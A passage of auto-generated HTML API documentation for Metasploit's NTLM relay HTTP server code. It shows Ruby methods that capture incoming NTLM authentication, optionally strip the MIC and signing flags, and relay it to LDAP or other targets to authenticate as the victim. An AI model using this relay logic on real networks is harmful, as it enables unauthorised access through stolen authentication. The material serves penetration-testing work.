<span class='id identifier rubyid_raise'>raise</span> <span class='const'>RuntimeError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>unsupported protocol: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_protocol'>protocol</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_client'>client</span>
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>ConnectionTimeout</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_msg'>msg</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Timeout error retrieving server challenge from target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'>. Most likely caused by unresponsive target</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_msg'>msg</span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span> <span class='id identifier rubyid_msg'>msg</span>
<span class='kw'>nil</span>
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'>Exception</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_msg'>msg</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Unable to create relay to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_msg'>msg</span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span> <span class='id identifier rubyid_msg'>msg</span>
<span class='kw'>nil</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="extract_ntlm_message-instance_method">
#<strong>extract_ntlm_message</strong>(auth_header) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
317
318
319
320
321
322
323
324
325
326</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 317</span>
<span class='kw'>def</span> <span class='id identifier rubyid_extract_ntlm_message'>extract_ntlm_message</span><span class='lparen'>(</span><span class='id identifier rubyid_auth_header'>auth_header</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span> <span class='kw'>unless</span> <span class='id identifier rubyid_auth_header'>auth_header</span>
<span class='comment'># Match either &quot;NTLM &lt;base64&gt;&quot; or &quot;Negotiate &lt;base64&gt;&quot; (case insensitive)
</span> <span class='kw'>if</span> <span class='id identifier rubyid_auth_header'>auth_header</span> <span class='op'>=~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>^(NTLM|Negotiate)\s+(.+)$</span><span class='regexp_end'>/i</span></span>
<span class='kw'>return</span> <span class='backref'>$1</span><span class='comma'>,</span> <span class='backref'>$2</span> <span class='comment'># Return The auth type and the base64 message
</span> <span class='kw'>end</span>
<span class='kw'>nil</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="finished?-instance_method">
#<strong>finished?</strong> &#x21d2; <tt>Boolean</tt>
</h3><div class="docstring">
<div class="discussion">
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Boolean</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
96
97
98</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 96</span>
<span class='kw'>def</span> <span class='id identifier rubyid_finished?'>finished?</span>
<span class='id identifier rubyid_state'>state</span> <span class='op'>==</span> <span class='symbol'>:done</span> <span class='op'>||</span> <span class='id identifier rubyid_state'>state</span> <span class='op'>==</span> <span class='symbol'>:aborted</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="handle_type1-instance_method">
#<strong>handle_type1</strong>(raw_ntlm_bytes, parsed_ntlm, auth_type) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 113</span>
<span class='kw'>def</span> <span class='id identifier rubyid_handle_type1'>handle_type1</span><span class='lparen'>(</span><span class='id identifier rubyid_raw_ntlm_bytes'>raw_ntlm_bytes</span><span class='comma'>,</span> <span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span><span class='comma'>,</span> <span class='id identifier rubyid_auth_type'>auth_type</span><span class='rparen'>)</span>
<span class='ivar'>@ntlm_context</span><span class='lbracket'>[</span><span class='symbol'>:type1</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_raw_ntlm_bytes'>raw_ntlm_bytes</span>
<span class='ivar'>@current_target</span> <span class='op'>||=</span> <span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_next'>next</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Target list exhausted for </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'>. Closing connection.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Http.html" title="Rex::Proto::Http (module)">Http</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Http/Response.html" title="Rex::Proto::Http::Response (class)">Response</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../../../Rex/Proto/Http/Response.html#initialize-instance_method" title="Rex::Proto::Http::Response#initialize (method)">new</a></span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_code'>code</span> <span class='op'>=</span> <span class='int'>404</span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Not Found</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Connection</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Close</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Content-Length</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>0</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_send_response'>send_response</span><span class='lparen'>(</span><span class='id identifier rubyid_res'>res</span><span class='rparen'>)</span>
<span class='ivar'>@state</span> <span class='op'>=</span> <span class='symbol'>:done</span>
<span class='kw'>return</span>
<span class='kw'>end</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Attempting to relay to </span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Socket</span><span class='period'>.</span><span class='id identifier rubyid_to_authority'>to_authority</span><span class='lparen'>(</span><span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='comma'>,</span> <span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_port'>port</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='ivar'>@relayed_connection</span> <span class='op'>=</span> <span class='id identifier rubyid_create_relay_client'>create_relay_client</span><span class='lparen'>(</span><span class='ivar'>@current_target</span><span class='comma'>,</span> <span class='ivar'>@timeout</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='ivar'>@relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Connection to </span><span class='embexpr_beg'>#{</span><span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed: unable to create relay client</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_advance_to_next_target_via_redirect'>advance_to_next_target_via_redirect</span>
<span class='kw'>return</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_drop_mic_and_sign_key_exch_flags'>drop_mic_and_sign_key_exch_flags</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_do_drop_mic_and_flags'>do_drop_mic_and_flags</span><span class='lparen'>(</span><span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_drop_mic_only'>drop_mic_only</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_do_drop_mic'>do_drop_mic</span><span class='lparen'>(</span><span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span><span class='period'>.</span><span class='id identifier rubyid_serialize'>serialize</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_relay_result'>relay_result</span> <span class='op'>=</span> <span class='ivar'>@relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_relay_ntlmssp_type1'>relay_ntlmssp_type1</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relay_result'>relay_result</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_MORE_PROCESSING_REQUIRED</span>
<span class='id identifier rubyid_type2_msg'>type2_msg</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span>
<span class='ivar'>@ntlm_context</span><span class='lbracket'>[</span><span class='symbol'>:type2</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_type2_msg'>type2_msg</span>
<span class='kw'>if</span> <span class='ivar'>@ntlm_context</span><span class='lbracket'>[</span><span class='symbol'>:wrapper</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='symbol'>:gss_spnego</span>
<span class='id identifier rubyid_wrapped_type2'>wrapped_type2</span> <span class='op'>=</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Gss</span><span class='period'>.</span><span class='id identifier rubyid_gss_type2'>gss_type2</span><span class='lparen'>(</span><span class='id identifier rubyid_type2_msg'>type2_msg</span><span class='period'>.</span><span class='id identifier rubyid_serialize'>serialize</span><span class='rparen'>)</span>
<span class='id identifier rubyid_target_type2_msg'>target_type2_msg</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_wrapped_type2'>wrapped_type2</span><span class='rparen'>)</span>
<span class='id identifier rubyid_auth_header'>auth_header</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_auth_type'>auth_type</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target_type2_msg'>target_type2_msg</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>else</span>
<span class='id identifier rubyid_target_type2_msg'>target_type2_msg</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_type2_msg'>type2_msg</span><span class='period'>.</span><span class='id identifier rubyid_serialize'>serialize</span><span class='rparen'>)</span>
<span class='id identifier rubyid_auth_header'>auth_header</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_auth_type'>auth_type</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target_type2_msg'>target_type2_msg</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Received type2 from target </span><span class='embexpr_beg'>#{</span><span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_protocol'>protocol</span><span class='embexpr_end'>}</span><span class='tstring_content'>://</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Socket</span><span class='period'>.</span><span class='id identifier rubyid_to_authority'>to_authority</span><span class='lparen'>(</span><span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='comma'>,</span> <span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_port'>port</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>, attempting to relay back to client</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Http.html" title="Rex::Proto::Http (module)">Http</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Http/Response.html" title="Rex::Proto::Http::Response (class)">Response</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../../../Rex/Proto/Http/Response.html#initialize-instance_method" title="Rex::Proto::Http::Response#initialize (method)">new</a></span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_code'>code</span> <span class='op'>=</span> <span class='int'>401</span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Unauthorized</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>WWW-Authenticate</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_auth_header'>auth_header</span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Connection</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Keep-Alive</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Content-Length</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>0</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_send_response'>send_response</span><span class='lparen'>(</span><span class='id identifier rubyid_res'>res</span><span class='rparen'>)</span>
<span class='ivar'>@state</span> <span class='op'>=</span> <span class='symbol'>:awaiting_type3</span>
<span class='kw'>return</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Target </span><span class='embexpr_beg'>#{</span><span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_content'> rejected the Type 1 message.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'>Exception</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Connection to </span><span class='embexpr_beg'>#{</span><span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_advance_to_next_target_via_redirect'>advance_to_next_target_via_redirect</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="handle_type3-instance_method">
#<strong>handle_type3</strong>(parsed_type3) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 189</span>
<span class='kw'>def</span> <span class='id identifier rubyid_handle_type3'>handle_type3</span><span class='lparen'>(</span><span class='id identifier rubyid_parsed_type3'>parsed_type3</span><span class='rparen'>)</span>
<span class='id identifier rubyid_relay_succeeded'>relay_succeeded</span> <span class='op'>=</span> <span class='kw'>false</span>
<span class='id identifier rubyid_relay_completed'>relay_completed</span> <span class='op'>=</span> <span class='kw'>false</span>
<span class='comment'># 1. Safely extract the identity from the Type 3 message early
</span> <span class='id identifier rubyid_identity'>identity</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='kw'>if</span> <span class='id identifier rubyid_parsed_type3'>parsed_type3</span>
<span class='id identifier rubyid_domain'>domain</span> <span class='op'>=</span> <span class='id identifier rubyid_parsed_type3'>parsed_type3</span><span class='period'>.</span><span class='id identifier rubyid_domain'>domain</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>UTF-8</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_user'>user</span> <span class='op'>=</span> <span class='id identifier rubyid_parsed_type3'>parsed_type3</span><span class='period'>.</span><span class='id identifier rubyid_user'>user</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>UTF-8</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_identity'>identity</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_domain'>domain</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_user'>user</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span> <span class='kw'>unless</span> <span class='id identifier rubyid_user'>user</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_drop_mic_and_sign_key_exch_flags'>drop_mic_and_sign_key_exch_flags</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_do_drop_mic_and_flags'>do_drop_mic_and_flags</span><span class='lparen'>(</span><span class='id identifier rubyid_parsed_type3'>parsed_type3</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_drop_mic_only'>drop_mic_only</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_do_drop_mic'>do_drop_mic</span><span class='lparen'>(</span><span class='id identifier rubyid_parsed_type3'>parsed_type3</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_parsed_type3'>parsed_type3</span><span class='period'>.</span><span class='id identifier rubyid_serialize'>serialize</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_relay_result'>relay_result</span> <span class='op'>=</span> <span class='ivar'>@relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_relay_ntlmssp_type3'>relay_ntlmssp_type3</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relay_result'>relay_result</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_SUCCESS</span>
<span class='id identifier rubyid_relay_succeeded'>relay_succeeded</span> <span class='op'>=</span> <span class='kw'>true</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_on_ntlm_type3'>on_ntlm_type3</span><span class='lparen'>(</span>
<span class='label'>address:</span> <span class='ivar'>@relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='comma'>,</span>
<span class='label'>ntlm_type1:</span> <span class='ivar'>@ntlm_context</span><span class='lbracket'>[</span><span class='symbol'>:type1</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>ntlm_type2:</span> <span class='ivar'>@ntlm_context</span><span class='lbracket'>[</span><span class='symbol'>:type2</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>ntlm_type3:</span> <span class='id identifier rubyid_parsed_type3'>parsed_type3</span><span class='comma'>,</span>
<span class='label'>service_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HTTP</span><span class='tstring_end'>&#39;</span></span>
<span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_identity'>identity</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Anonymous Identity - Successfully authenticated against relay target </span><span class='embexpr_beg'>#{</span><span class='ivar'>@relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='ivar'>@relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_disconnect!'>disconnect!</span> <span class='kw'>if</span> <span class='ivar'>@relayed_connection</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_identity'>identity</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Successfully relayed NTLM authentication to LDAP!</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_on_relay_success'>on_relay_success</span><span class='lparen'>(</span><span class='label'>relay_connection:</span> <span class='ivar'>@relayed_connection</span><span class='comma'>,</span> <span class='label'>relay_identity:</span> <span class='id identifier rubyid_identity'>identity</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='ivar'>@relayed_connection</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Relayed authentication failed or was rejected by LDAP.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='ivar'>@relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_disconnect!'>disconnect!</span> <span class='kw'>if</span> <span class='ivar'>@relayed_connection</span>
<span class='ivar'>@relayed_connection</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
